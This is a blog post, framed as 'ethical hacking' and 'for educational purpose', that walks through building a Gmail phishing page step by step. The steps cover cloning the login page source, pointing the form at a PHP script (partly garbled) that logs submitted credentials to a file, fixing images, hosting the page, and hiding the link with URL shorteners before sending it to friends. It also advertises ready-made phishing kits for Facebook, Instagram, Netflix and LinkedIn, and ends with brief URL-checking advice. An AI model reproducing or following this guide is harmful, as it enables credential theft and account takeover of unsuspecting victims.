Phishing Page/Social Engineering – Ethical Hacking

Attention : This post is for educational purpose.

You can visit our store and download ready made phishing page of various websites(Facebook, Instagram, Netflix, Linkedin, etc.)

In this post i’ll be guiding you and sharing knowledge on

• What is Phishing Page/Social Engineering
• How are Phishing Page made
• How to defend yourself from phishing page/social engineering.

What is Phishing Page/Social Engineering

Phishing is a particularly popular scam in which a party creates an official-looking web page that asks you to provide your username and password, or other personal information such as your Social Security number, bank account number, PIN number, credit card number, or mother’s maiden name or birthday.

In many cases, you’ll receive a link to this phishing page via an email which claims to come from an official-looking (but probably forged) address. You can also end up at these pages by following links that you find on the web or in IM messages.

How are Phishing Page made

Lets make a Gmail Phishing Page for example

Step 1:

Open gmail.com and right click on the page. You will see many options, just select View page source.

Step 2:

Now simply copy the entire code (press CTRL+A and then CTRL+C of your keyboard for copying the entire code). After copying the code open notepad and paste the code by pressing CTRL+V.

Step 3:

Scroll to the top and press CTRL+F of your keyboard. You will get a dialogue box on your screen. Simply type “action=” in the space provided without inverted commas. And hit enter.

Step 4:

Replace the link corresponding to action= with post.php see image below,it will make it clearer.

Step 5:

Open a new notepad file and simply copy and paste the below code. You can also modify the code as this code redirects the victims to a new page after he enters his password and username.

If you want the user to get redirected to original/genuine gmail.com page after writing his password and user name leave it as it is and if you want to redirect the victim to some new site replace “http://www.gmail.com/” with desired site name in the below code.

$value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “\r\n”); } fwrite($handle, “\r\n”); fclose($handle); exit; ?>

Save the file as post.php

Now you have completes making your Phishing page ,open index.html to see your phishing page. If page looks fine then skip to uploading the file to site.

Step 6:

When you will open index.html you will see that your phishing page is not as same as Gmail original/genuine page ,it is missing many images and logo.

So,it’s time to fix them.

All you have to do is open index.html in notepad .Just make a right click on index.html and hover over open with and select notepad.

Press CTRL+F of your keyword to find the following links and replace the following links with corresponding links:

• Firstly Find: //ssl.gstatic.com/accounts/ui/logo_2x.png for fixing Google logo.
• Replace it with: http://i.imgur.com/8aPqK7U.png
• Secondly, Find: //ssl.gstatic.com/accounts/ui/avatar_2x.png for fixing avatar.
• Replace it with: http://i.imgur.com/cADQ5wi.png
• Thirdly Find: //ssl.gstatic.com/accounts/ui/logo_strip_2x.png for fixing logo strip
• And replace it with: http://i.imgur.com/O1V8kOU.png
• Lastly Find: //ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png for fixing language icon.
• And replace it with: http://i.imgur.com/2reaCDM.png

Now save your work and again open index.html by double clicking and you will see all the things have been fixed and your page looks exactly like original Gmail page.

To download this Phishing Page click here

Visit our store and download ready made phishing page of various websites(Facebook, Instagram, Netflix, Linkedin, etc.)

Now its time to host your gmail phishing page(both index.html and post.php) in hosting sites.

To learn how to host phishing page to hosting site for free, please visit my tutorial “How to upload your website to hosting page for FREE“

After uploading the files all you have to do is start spreading your link to your friends and whenever they will click on the link they will be redirected to gmail.com and whenever they will enter the username and password you will also get the username and password of your friend.

Note: You can shorten your link with link shortening sites so that victim don’t get to know that the link is from a free hosting site. Or you can buy hosting from : Ipage Hosting and get your Phishing Page going…!!

How to defend yourself from phishing page/social engineering.

The best thing to do is to check the page’s URL to make sure it’s actually controlled by the party it appears to be controlled by. The crucial part of the URL is the part between the http:// and the next slash (‘/’). (If there’s no slash, start at the end of the URL.) This is the part of the URL that determines site ownership. Some popular domains, for instance, are amazon, google, and ebay:

• http://www.amazon.com
• http://www.google.com
• http://www.ebay.com

In some cases, URLs will be a bit more complex; be sure to check the name listed immediately to the left of the top level domain (.com, .net, .co.uk, etc.).
For instance, http://www.google.com, http://news.google.com and http://www.google.com/firefox/ are all part of the same site. However, google.com.fraudulentdomain.com/login.html is NOT! Neither is www.g00gle.com (note that in this URL, the letter o is replaced by the number 0).

Tip: Since a forged URL can look very similar to a genuine one, it’s safer to use a bookmark you’ve created or to type the URL into the location bar by hand instead of following links from your email. This is important for any page where you’re asked to log in or provider private information.

Congratulations!!! Now you are 1 step towards the Cyber Security. I’ll be uploading more posts on cyber security/Ethical Hacking. Stay Tuned.

If you like the article and find it interesting. Share it!!! See You On Other Tutorial